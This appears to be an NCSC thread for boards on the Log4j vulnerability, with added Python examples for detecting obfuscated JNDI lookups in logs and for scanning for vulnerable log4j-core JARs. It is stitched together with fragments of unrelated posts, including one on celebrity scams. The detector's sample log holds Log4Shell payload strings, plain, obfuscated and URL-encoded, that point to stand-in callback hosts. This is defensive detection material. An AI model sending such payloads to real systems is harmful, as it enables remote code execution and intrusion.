#Log4j is a widely used Java logging library: developers use it to keep track of what happens inside their software applications.
📒 Think of it as a huge journal of the activity of a system or application, which developers use to keep an eye on any problems.
(2/19)
Last week, versions of #Log4j were found to have a critical vulnerability.
🕵️If left unfixed, attackers can use it to run their own code on affected systems, break into networks and enable malicious activity like stealing data and spreading across networks.
(3/19)
What makes this so concerning is the challenge for organisations of working out:
➕ Which services use the #Log4j component
➕ Which of these services are being used
➕ Whether these services are vulnerable
(4/19)
❓How concerned should boards be?
#Log4j has the potential to cause severe impact for an organisation. While defenders are still working out which services are vulnerable, attackers are already exploiting the vulnerability. The situation is changing regularly.
At the moment, the majority of attacks are automated and exploratory. But should ransomware be delivered through #Log4j:
🔴business operations could be disrupted
🧑disclosures needed about personal data affected
💷costs involved with incident response & recovery
(6/19)
As such, the potential impacts range from minimal to a crippling attack on the organisation.
🤝Managing that risk requires strong leadership and working in concert with technical teams.
(7/19)
With all this in mind it's no wonder that #Log4j has the cyber community concerned.
❓ Whether you're up to speed or hearing about it for the first time, we've put together 10 questions you should be asking of your IT teams.
(8/19)
1⃣: Who's leading on this?
🐯 #Log4j is severe enough that a 'tiger team' of staff should be assembled, with a designated individual leading the response.
(9/19)
2⃣: What's our plan?
📅 Initial firefighting will likely give way to a more methodical approach to identifying how the organisation is affected. Large organisations will need a phased approach to handling this issue over many weeks or months.
(10/19)
3⃣: How will we know if we're being attacked - and how can we respond?
⚔️Would your teams know if the organisation is being targeted and how prepared are they for an at-scale response?
(11/19)
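As an added worked example (not part of the NCSC thread), here is the kind of check a detection team could run over web-server logs to answer that question. The exploit string arrives in any field the application logs (User-Agent, URL, headers), and attackers disguise it with nested lookups such as `${lower:j}` and `${::-n}` and with URL-encoding, so the script normalises each line before matching. The log lines below are constructed for the example and use documentation IP ranges.

```python
"""Spot Log4Shell-style JNDI lookup strings in log lines, including common obfuscations.
Added example; the sample log is constructed, not captured from a real system."""
import re
from urllib.parse import unquote

# Inner lookups attackers use to disguise the word "jndi":
#   ${lower:j} / ${upper:J}   -> j / J
#   ${::-j}, ${env:NaN:-j}    -> "j" (the default value after ":-")
INNER_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"   # group 1: case-change lookup
    r"|\$\{[^${}]*?:-([^${}]*)\}"        # group 2: default-value lookup
)
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)

def normalise(line: str) -> str:
    """Undo URL-encoding, then resolve inner lookups until nothing changes."""
    text = unquote(line)
    for _ in range(20):  # bounded: each pass removes at least one ${...}
        new = INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if new == text:
            break
        text = new
    return text.lower()

def detect(lines):
    """Return (line_number, scheme, normalised_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalise(line)
        m = JNDI.search(norm)
        if m:
            hits.append((n, m.group(1), norm))
    return hits

# Constructed access-log sample: 1 and 5 benign, 2 plain, 3 obfuscated, 4 URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [13/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [13/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NaN:-i}:${lower:l}dap://203.0.113.9:1389/Basic/Command}"',
    '10.0.0.5 - - [13/Dec/2021:10:01:04 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.5 - - [13/Dec/2021:10:01:05 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme, norm in detect(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {scheme}: {norm}")
```

A hit is a reason to pull the source IP, the callback host and the targeted service into the incident process; it is not proof of compromise, because most of this traffic is the automated, exploratory scanning the thread describes. Obfuscation evolves, so treat the lookup list as a starting point rather than a complete signature.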
4⃣: What visibility of our software/servers do we have?
🔎Your IT teams should be trying to find instances of software that uses #Log4j, and of the #Log4j component itself. This task will be easier on corporately-managed assets but less so on unmanaged assets.
(12/19)
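Working out which services use the component and whether they are vulnerable (the list earlier in the thread, and question 4 here) comes down to finding every copy of log4j-core on a host, including copies buried inside WAR/EAR files and fat JARs. The following is an added Python example, not from the NCSC thread: it walks a directory tree, opens archives recursively, reads the version from the JAR's own pom.properties and checks whether JndiLookup.class is still present. It assumes that releases below 2.16.0 that still ship JndiLookup.class are vulnerable to the JNDI lookup bug (2.15.0 closed only part of the hole), and it builds a small constructed sample tree so it runs offline.

```python
"""Find Log4j 2 'log4j-core' in a directory tree, including copies nested in
WAR/EAR/fat JARs, and report version plus whether JndiLookup.class is present.
Added example. Assumption: log4j-core below 2.16.0 that still contains
JndiLookup.class is vulnerable. Log4j 1.x is out of scope here."""
import io
import os
import re
import sys
import tempfile
import zipfile
from dataclasses import dataclass

FIXED_VERSION = (2, 16, 0)  # assumption, see module docstring
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

@dataclass
class Finding:
    path: str  # outer file; nested entries appended with "!/"
    version: str
    jndi_lookup_present: bool
    vulnerable: bool

def parse_version(text: str):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0), so betas sort below the fix."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(n or 0) for n in m.groups()) if m else None

def inspect_archive(zf: zipfile.ZipFile, label: str, findings: list) -> None:
    names = set(zf.namelist())
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        version = m.group(1).strip() if m else "unknown"
        parsed = parse_version(version)
        has_jndi = JNDI_CLASS in names
        # Old version AND JndiLookup still in the JAR (deleting that class was the
        # published stop-gap for systems that could not be upgraded immediately).
        vulnerable = bool(parsed is not None and parsed < FIXED_VERSION and has_jndi)
        findings.append(Finding(label, version, has_jndi, vulnerable))
    # Recurse into nested archives: WEB-INF/lib/*.jar, shaded jars, bundled zips.
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(inner, f"{label}!/{name}", findings)

def scan_tree(root: str) -> list:
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fn)
                try:
                    with zipfile.ZipFile(full) as zf:
                        inspect_archive(zf, full, findings)
                except zipfile.BadZipFile:
                    continue
    return findings

# --- constructed sample estate so the scanner can be exercised offline -------
def _fake_log4j_core(version: str, keep_jndi: bool) -> bytes:
    """Stand-in JAR holding only the two entries the scanner reads (not a real JAR)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if keep_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()

def build_sample_tree(root: str) -> None:
    """A WAR bundling vulnerable 2.14.1, a patched 2.17.1, and a 2.14.1 with JndiLookup removed."""
    os.makedirs(os.path.join(root, "webapps"))
    with zipfile.ZipFile(os.path.join(root, "webapps", "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1", True))
    with open(os.path.join(root, "log4j-core-2.17.1.jar"), "wb") as f:
        f.write(_fake_log4j_core("2.17.1", True))
    with open(os.path.join(root, "log4j-core-2.14.1-jndi-removed.jar"), "wb") as f:
        f.write(_fake_log4j_core("2.14.1", False))

def demo() -> dict:
    """Scan the constructed tree; map each path (relative to root) to (version, vulnerable)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        out = {}
        for f in scan_tree(root):
            outer, _, inner = f.path.partition("!/")
            key = os.path.relpath(outer, root).replace(os.sep, "/") + (f"!/{inner}" if inner else "")
            out[key] = (f.version, f.vulnerable)
        return out

if __name__ == "__main__":
    results = (demo() if len(sys.argv) < 2 else
               {f.path: (f.version, f.vulnerable) for f in scan_tree(sys.argv[1])})
    for path, (version, vuln) in sorted(results.items()):
        print(f"{'VULNERABLE' if vuln else 'ok        '} {version:<10} {path}")
```

Run it with a path (for example `/opt` or a container image's extracted filesystem) to scan a real host; without one it scans the constructed sample. A hit only tells you the library is present: whether the service is reachable by attackers and logs attacker-controlled input is the next question, and a file scan cannot see inside vendor appliances or SaaS, which is where questions 5 and 6 come in.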
5⃣: How are we addressing shadow IT & appliances?
🔍Many organisations won’t know all the places #Log4j might be running. Encourage teams to think about how they'll discover things that have slipped through the net.
(13/19)
6⃣: Do we know if key providers are covering themselves?
🛡️ If your organisation is dependent on any particularly key suppliers, you should have an open & honest conversation with them, acknowledging they will also be trying to understand the severity of the issue.
(14/19)
7⃣: Who internally develops Java code? What's their plan for finding out if we're affected?
#⃣ Larger organisations may produce code themselves. Java developers may have used #Log4j directly, or pulled it in through another library, so it's important to check that any software written in-house is not vulnerable.
(15/19)
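For the developers in question 7, the quickest check is the build tool's dependency report, because Log4j is often brought in transitively by another library rather than declared directly: `mvn dependency:tree -Dincludes=org.apache.logging.log4j` for Maven, or `gradle dependencyInsight --dependency log4j-core` for Gradle. Where a vulnerable copy turns up, the fragment below is an added example (not from the NCSC thread) of forcing every transitive copy in a Maven build onto a fixed release; the version 2.17.1 is an assumption, so use whichever release the current Apache advisory names.

```xml
<!-- Added example pom.xml fragment: dependencyManagement overrides the version of
     log4j-core/log4j-api wherever they appear in the dependency tree, including
     copies requested by third-party libraries. 2.17.1 is an assumed target version. -->
<dependencyManagement>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>2.17.1</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.17.1</version>
    </dependency>
  </dependencies>
</dependencyManagement>
```

Re-run the dependency report after the change to confirm no older version survives, and remember this only covers code you build yourself: shaded or fat JARs shipped by vendors carry their own copy of Log4j, which is why question 5 matters as much as this one.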
8⃣: How will people report issues they find?
📨 Many researchers are trying to detect vulnerable software right now. Should they find something on your estate, can they contact you easily?
(16/19)
9⃣: When did we last check our business continuity plans and crisis response?
📋Verify your end-to-end BCP and crisis response processes.
(17/19)
🔟: How are we preventing teams from burning out?
🩹 Remediating this is likely to take weeks, or months for larger organisations. The combination of an ever-evolving situation (& the potential for severe impacts) can lead to burnout in staff if they’re not supported.
(18/19)
📖 Learn more about mitigating the threat of #Log4j in our full guidance to board members:
🌍 It's a potentially Internet-wide security flaw which has the potential to affect many of the devices and services we use online every day.
(2/8)
⏲️ Let's take a step back.
🖥️ Modern software can be large, powerful and complex. It's increasingly made out of 'building blocks': rather than teams writing new code every time, they often use existing code to speed things up.
Earlier this morning, Nicola Hudson, Director of Policy & Comms at the NCSC, was on #RipOffBritain talking about fake celeb scams. Catch up now on BBC iPlayer for Nicky's tips on how to avoid falling for them – and what you can do to help us take them down 👇
Stay one step ahead of celebrity scams with the latest tips from the National Cyber Security Centre. Our very own Nicola Hudson spoke this morning with Gloria Hunniford on #RipOffBritain. Catch up now: bbc.co.uk/iplayer/live/b…
Here are just a couple of the celeb scams we’ve seen this year. The first – a fake article on how pop singer Ed Sheeran’s made millions through investing in Bitcoin.
Can you spot the big clue that all isn’t as it seems?